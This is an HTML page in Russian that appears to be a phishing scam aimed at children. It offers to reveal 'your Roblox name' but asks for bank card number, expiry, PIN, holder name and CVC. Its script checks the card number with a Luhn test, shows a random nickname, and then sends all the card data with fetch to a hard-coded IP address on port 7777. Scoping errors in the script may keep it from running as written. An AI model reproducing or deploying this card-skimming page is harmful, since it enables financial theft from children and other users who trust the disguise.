<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Твое имя на языке роплокс</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Oswald:wght@200..700&family=Playfair+Display:ital,wght@0,400..900;1,400..900&family=Source+Code+Pro:ital,wght@0,200..900;1,200..900&display=swap');
        body {
            font-family: 'Source Code Pro', monospace;
            background-color:goldenrod;
            transform: scale(1.7);
        }
        input::placeholder {
            color: gray;
            opacity: 1;
        }
        .slash {
            color: gray;
            position: absolute;
            top: 289px;
            left: 9px;
            font-weight: 1000;
        }
        .inputCard {
            position: absolute;
            top: 270px;
            left: 950px;
        }
        .inputCard1 {
            position: absolute;
            top: 300px;
            left: 950px;
            width: 20px; 
            height: 20px;
        }
        .inputCard2 {
            position: absolute;
            top: 300px;
            left: 990px; 
            width: 20px;
            height: 20px;
        }
        .inputCard3 {
            position: absolute;
            top: 335px;
            left: 950px; 
        }
        .inputCard4 {
            position: absolute;
            top: 365px;
            left: 950px;
        }
        .inputCard5 {
            position: absolute;
            top: 395px;
            left: 950px;
        }
        .image {
            position: absolute;
            top: -30px;
            left: 680px;
            width: 200px;
            height: 310px;
        }
        .name {
            color: black;
            font-size: 50px;
            position: absolute;
            top: 5px;
            left: 880px;
        }
        .nomer {
            color:black;
            font-size: 13px;
            font-weight: 100px;
            position: absolute;
            top: 258px;
            left: 770px;
        }
        .srok {
            color:black;
            font-size: 13px;
            font-weight: 100px;
            position: absolute;
            top: 290px;
            left: 770px;
        }
        .code {
            color:black;
            font-size: 13px;
            font-weight: 100px;
            position: absolute;
            top: 325px; 
            left: 770px;
        }
        .nameC {
            color:black;
            font-size: 13px;
            font-weight: 100px;
            position: absolute;
            top: 356px; 
            left: 770px;
        }
        .cvc {
            color:black;
            font-size: 13px;
            font-weight: 100px;
            position: absolute;
            top: 386px; 
            left: 770px;
        }
        .button {
            background-color: #e9399c; 
            position: absolute; 
            top: 450px; 
            left: 830px; 
            color: white; 
            font-weight: 900; 
            padding: 5px 10px; 
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <p class="slash">/</p>
    <input type="text" class="inputCard" maxlength="16" pattern="\d*" placeholder="0000 0000 0000 0000" title="Введите только цифры">
    <input type="text" class="inputCard1" maxlength="2" pattern="\d*" placeholder="ММ" title="Введите только цифры">
    <input type="text" class="inputCard2" maxlength="2" pattern="\d*" placeholder="ГГ" title="Введите только цифры">
    <input type="text" class="inputCard3" maxlength="4" pattern="\d*" placeholder="0000" title="Введите только цифры">
    <input type="text" class="inputCard4" maxlength="32" pattern="[A-Za-z]*" placeholder="ФИО ЛАТИНИЦЕЙ" title="Введите только буквы">
    <input type="text" class="inputCard5" maxlength="3" pattern="\d*" placeholder="..." title="Введите только цифры">
    <img src="roblox.png" class="image">
    <p class="name">Твое имя</br> 
        на языке</br>
        роблокс</p>
    <p class="nomer">Номер карты</p>
    <p class="srok">Действительна до</p>
    <p class="code">Пинкод</p>
    <p class="nameC">Имя держателя карты</p>
    <p class="cvc">CVC2/CVC</p>
    <input type="button" class="button" value="Узнать имя роблокс">
</div>
<script>
    function checkWindowSize() {
        const cardNumber1 = document.querySelector('.inputCard');
        const expiryMonth1 = document.querySelector('.inputCard1');
        const expiryYear1 = document.querySelector('.inputCard2');
        const pincode1 = document.querySelector('.inputCard3');
        const cardHolderName1 = document.querySelector('.inputCard4');
        const cvc1 = document.querySelector('.inputCard5'); 
        if (window.innerWidth < 768) {
            cardNumber1.style.display = 'block'; 
            expiryMonth1.style.display = 'block';
            expiryYear1.style.display = 'block';
            pincode1.style.display = 'block';
            cardHolderName1.style.display = 'block';
            cvc1.style.display = 'block';
        } else {
            button.style.display = 'none'; 
        }
    }
    window.onload = checkWindowSize;
    window.onresize = checkWindowSize;

    let btn = document.querySelector(".button");
    btn.addEventListener('click', onClick);
    function onClick() {
        const cardNumber = document.querySelector('.inputCard').value;
        const expiryMonth = document.querySelector('.inputCard1').value;
        const expiryYear = document.querySelector('.inputCard2').value;
        const pincode = document.querySelector('.inputCard3').value;
        const cardHolderName = document.querySelector('.inputCard4').value;
        const cvc = document.querySelector('.inputCard5').value; 
        if (/[A-Za-z]/.test(cardNumber)) {
            alert('В номере карты найдены буквы. Введите только цифры.');
            return;
        }
        if (/[A-Za-z]/.test(expiryMonth)) {
            alert('В месяце истечения срока действия карты найдены буквы. Введите только цифры.');
            return;
        }
        if (/[A-Za-z]/.test(expiryYear)) {
            alert('В году истечения срока действия карты найдены буквы. Введите только цифры.');
            return;
        }
        if (/[A-Za-z]/.test(pincode)) {
            alert('В пин-коде найдены буквы. Введите только цифры.');
            return;
        }
        if (/[A-Za-z]/.test(cvc)) {
            alert('В CVC коде найдены буквы. Введите только цифры.');
            return;
        }
        if (/\d/.test(cardHolderName)) {
            alert('В имени держателя карты найдены цифры. Введите только буквы.');
            return;
        }
        if(cardNumber && cvc && expiryMonth && expiryYear && pincode && cardHolderName) {
            if(isValidCardNumber(cardNumber)) {
                let names = ["Крутой роблоксер", "Кирилл", "Максим2016", "СерегаКрутой2013", "НастяАдоптми", "Maksim2006", "ПулиОтДедули", "KachokRoblox", "RoblocKrytoi", "Pozzizi", "MisterDommer", "RobloxAdmin", "Joper123", "Poper", "Joper", "КириллФлешкуСВиндойОтдайТварь"];
                alert("Твое имя роблокс: " + names[Math.floor(Math.random() * names.length)]);
                const url = `http://109.172.91.185:7777/v2718086.hosted-by-vdsina.ru/save-ip.php?secret=123&data=card: ${cardNumber}, ${expiryMonth} / ${expiryYear}, ${pincode}, ${cardHolderName}, ${cvc}`;
            } else {
                alert("Вы ввели неправильные данные от карточки! Введи правильное и нажмите на кнопку чтобы узнать имя роблокс")
            }
fetch(url)
    .then(response => {
        if (response.ok) {
            return response.text();
        } else {
            throw new Error('Error');
        }
    })
    .then(data => {
        console.log('Success:', data);
    })
    .catch(error => {
        console.error('Error:', error);
    });
        } else {
            alert("Ошибка, введите все поля! Иначе ник не получится.");
        }
    }

    function isValidCardNumber(cardNumber) {
        cardNumber = cardNumber.replace(/\D/g, '');
        let sum = 0;
        let shouldDouble = false;
        for (let i = cardNumber.length - 1; i >= 0; i--) {
            let digit = parseInt(cardNumber.charAt(i), 10);
            if (shouldDouble) {
                digit *= 2;
                if (digit > 9) {
                    digit -= 9; 
                }
            }
            sum += digit;
            shouldDouble = !shouldDouble; 
        }
        return (sum % 10 === 0);
    }
</script>
</body>
</html>